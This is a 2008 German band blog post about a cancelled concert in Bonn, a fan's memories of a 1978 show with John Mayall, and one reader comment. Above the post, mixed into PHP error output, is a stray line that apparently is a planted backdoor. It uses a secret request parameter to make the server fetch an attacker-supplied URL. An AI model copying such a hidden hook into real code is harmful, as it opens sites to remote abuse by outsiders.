Deprecated: Assigning the return value of new by reference is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 520

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 535

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 542

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 578

Deprecated: Function set_magic_quotes_runtime() is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 18
isset($_REQUEST['kocopu']) && fetch_feed($_REQUEST['feed_url']);
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /homepages/u21512/schroeder/schroederblog/wp-settings.php:520) in /homepages/u21512/schroeder/schroederblog/wp-content/plugins/formbuilder/captcha/CaptchaSecurityImages.php on line 26

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /homepages/u21512/schroeder/schroederblog/wp-settings.php:520) in /homepages/u21512/schroeder/schroederblog/wp-content/plugins/formbuilder/captcha/CaptchaSecurityImages.php on line 26
Schroeder Roadshow » keine harmonie

keine harmonie

Schroeder am 17. Dezember 2008

Einen Tag nach unserem geplanten Auftritt in der Bonner Harmonie.
Wie bekannt ist, haben wir den gig absagen müssen, weil sich Gertys Stimmbänder mit einem Virus infiziert haben. Seine Stimme klang schlimm am Telefon, er war bei seinem Arzt, der ihm drei Tage “Singverbot” ausgesprochen hat, und er hat ihm ein Attest gegeben, falls wir das wegen des Gastspielvertrages brauchen - welcher Gastspielvertrag?

Ich war mit der Familie am Abend in der Harmonie, um mich ggfls. um enttäuschte Konzertbesucher kümmern zu können. Diese Maßnahme schien mir sinnvoll und wurde sowohl vom Veranstalter Kolli als auch von Gerty und Vladi begrüßt. Außerdem hatte unsere Familie selber Gäste dorthin bestellt und in Empfang zu nehmen, also haben wir dort zu Abend gegessen.

Mit Volker Herde traf ich dort einen SCHROEDER-Fan, der schon sehr betrübt war. Er hatte sich sehr auf das Konzert gefreut, hatte am morgen nochmal ANNEMIE und CAFE ZUM ZERBROCHENEN SCHWAN gehört und seinen alltime Lieblingssong REISE AN DEN ARSCH DER WELT. Volker hatte sich auch auf ein Wiedersehen eingestellt und kam auf mich zu. Er habe bei unserem Auftritt auf der Bundesgartenschau (in Bonn) damals, 1978, den Sound gemacht. Ich erinnere mich, wir spielten damals in einem Riesenzelt auf der Rheinwiese zusammen mit, oder besser vor, John Mayall, dessen Manager mehrmals zu uns auf die Bühne kam um uns zu bedeuten, wir mögen doch aufhören, das Publikum sei ‘high enough’. High genug - jawohl, das kann schon sein. Rich hatte einen guten Abend an der vorderen Bühnenkante und protestierte gegen das Rauchverbot, indem er unablässig Selbstgedrehte von seinem Türkenkost-Tabak ins Publikum warf. Volker wußte gestern noch, daß ich mich an der Deutschlandfahne ‘aufgehängt’ hatte. Fürwahr ein wilder Abend für dreitausend und uns sechs. Der Grundschullehrer Mayall muß es wohl echt schwer gehabt haben hinterher, er wird wohl versucht haben, das Publikum erst mal zur Ordnung zu bringen.

‘Deutschlandfahne’ meinte meine Familie und jemand deutet auf den aktuellen SCHROEDER-Flyer: schwarz-rot-gold, die Farbe im SCHROEDER-Logo. Ja, so isset!
Auch an unserem Tisch vier GrundschullehrerInnen - heiajei!

Aber insgesamt muß die Absage-Aktion per mail undso gut gegriffen haben, weil sich nur wenige vergebliche Konzertbesucher in die Harmonie verlaufen haben. Klaus, langjähriger Saxmann in der PPP-Combo, hatte extra Praxistermine verlegt, sorry an dieser Stelle!
40 Jahre haben wir bisher keinen einzigen gig absagen müssen. War auch ein seltsames Gefühl, nicht im Saal zu stehen und abzurocken, sondern im Haus herumzuirren. Dabei hätte ich fast noch eine Thekenrunde am Hals gehabt, manno, nicht über die Umrandung an der Theke treten, auch nicht, wenn man sagen will, man sei einer von den Musikern, die heute nicht spielen würden, und ob denn jemand da wäre, der undsoweiter …

Ja, schade Soundmann Volker aus der Rheinaue, du willst nach Kreta auswanden, hast deine Gitarre verkauft, als es dir schlecht ging und jetzt, seit die neue SCHROEDER HINTERHOF-CD bei dir auf der Anlage spielt, überlegst du, doch wieder Musik zu machen, willst die Instrumente zurückhaben. Hast keinen Computer, haßt e-mails, aber ich habe jetzt deine Postadresse auf dem Bierdeckel. Schätze, daß ich dir hin und wieder was zuschicke.
Machs gut und tschüß, Bonn.

Abgelegt unter Konzert, TourTageBuch | Ein Kommentar

Ein Kommentar zu “keine harmonie”

  1. Dieter V.am 20. Dezember 2008 um 14:21

    Nun hoffe ich aber doch sehr, dass heute abend
    in Düren alles klar geht!? Freue mich schon länger
    darauf und höre seit Tagen die neue CD hoch und
    runter.

Trackback URI | Kommentare als RSS

Einen Kommentar schreiben